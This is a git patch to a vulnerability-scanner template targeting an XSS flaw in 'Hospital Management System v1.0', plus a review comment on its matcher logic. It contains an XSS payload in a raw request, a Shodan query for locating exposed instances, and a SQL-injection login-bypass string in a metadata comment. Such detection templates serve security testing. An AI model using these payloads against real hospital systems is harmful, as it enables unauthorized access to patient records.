From 8c672ef591bd64904084aaa66b32a8cc880663aa Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:02:02 +0530
Subject: [PATCH] Update and rename hms-xss-2.yaml to
hospital-management-xss2.yaml
---
...s-2.yaml => hospital-management-xss2.yaml} | 29 ++++++++-----------
1 file changed, 12 insertions(+), 17 deletions(-)
rename vulnerabilities/other/{hms-xss-2.yaml => hospital-management-xss2.yaml} (66%)
diff --git a/vulnerabilities/other/hms-xss-2.yaml b/vulnerabilities/other/hospital-management-xss2.yaml
similarity index 66%
rename from vulnerabilities/other/hms-xss-2.yaml
rename to vulnerabilities/other/hospital-management-xss2.yaml
index 42b897e5b7..fbaeb204d7 100644
--- a/vulnerabilities/other/hms-xss-2.yaml
+++ b/vulnerabilities/other/hospital-management-xss2.yaml
@@ -1,4 +1,4 @@
-id: hms-xss-2
+id: hospital-management-xss2
info:
name: Hospital Management System v1.0 - Cross Site Scripting
@@ -7,10 +7,10 @@ info:
description: |
Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
metadata:
- comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
- shodan-query: http.html:"Hospital Management System"
verified: true
- tags: hms,hospital,cms,xss
+ shodan-query: http.html:"Hospital Management System"
+ comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+ tags: hms,hospital,cms,xss,authenticated
requests:
- raw:
@@ -26,19 +26,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- searchdata=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search=
+ searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
- skip-variables-check: true
- redirects: true
- max-redirects: 2
+ req-condition: true
cookie-reuse: true
- matchers-condition: and
matchers:
- - type: word
- part: body
- words:
- - ''
-
- - type: status
- status:
- - 200
+ - type: dsl
+ dsl:
+ - 'contains(all_headers_2, "text/html")'
+ - "status_code_2 == 200"
+ - contains(body_2, 'Result against \"\" keyword')
+ condition: and
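Review bot: The new DSL matcher never asserts that the injected payload is reflected, so a status-200 HTML page carrying the static result text satisfies all three conditions whether or not the search term is echoed unescaped, which is what actually makes this an XSS finding. The request on the `searchdata=` line submits `<script>alert(document.domain)</script>`, so the `dsl` list should also carry `- contains(body_2, '<script>alert(document.domain)</script>')` so that the `and` condition only passes when that exact string comes back. It is also not obvious from the hunk that a page which reflects the term would still print `Result against "" keyword` verbatim; that string presumably wraps the echoed term, so confirm it on a reference instance before relying on it. The `\"\"` in the last contains() sits in a plain YAML scalar, so the backslashes reach the DSL engine literally; if the engine does not unescape them the comparison silently fails and the template never matches, so either verify that behaviour or quote the line at the YAML level. The `- raw:` request these options belong to starts before the hunk.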